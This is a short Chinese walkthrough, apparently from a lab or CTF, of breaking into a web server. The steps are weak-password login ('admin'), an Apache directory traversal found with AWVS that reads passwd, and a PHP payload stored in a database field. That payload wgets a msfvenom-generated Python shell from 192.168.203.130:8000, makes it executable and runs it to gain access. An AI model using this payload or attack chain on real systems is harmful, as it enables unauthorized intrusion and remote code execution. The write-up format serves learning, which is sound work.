原理:当客户端访问到一个目录时,Apache服务器将会默认寻找一个index list中的文件,若文 件不存在,则会列出当前目录下所有文件或返回403状态码,而列出目录下所有文件的行为称为目录遍历。
1.扫描,看到个很admin有关的页面
2.老规矩试一下弱口令admin,进入成功,是个数据库后台管理页面
3.使用AWVS扫描网站,有个目录遍历漏洞,根据漏洞详情在地址栏输入地址得到passwd的内容,说明这个漏洞可行
3.这样就可以上传webshell,用目录遍历的方式启动。用msfvenom生成一个基于Python的webshell
4.在数据库后台新建一个数据库,创建一个表,并设置元组为1个
5.设置元组类型为txt,值为<?php system("cd /tmp;wget http://192.168.203.130:8000/shell.py;chmod 777 shell.py;python shell.py");?>,当访问数据库的时候系统会自动读取改值,并执行命令,相当于一个脚本
6.利用python建立简单http服务器
7.复制路径,访问并取得权限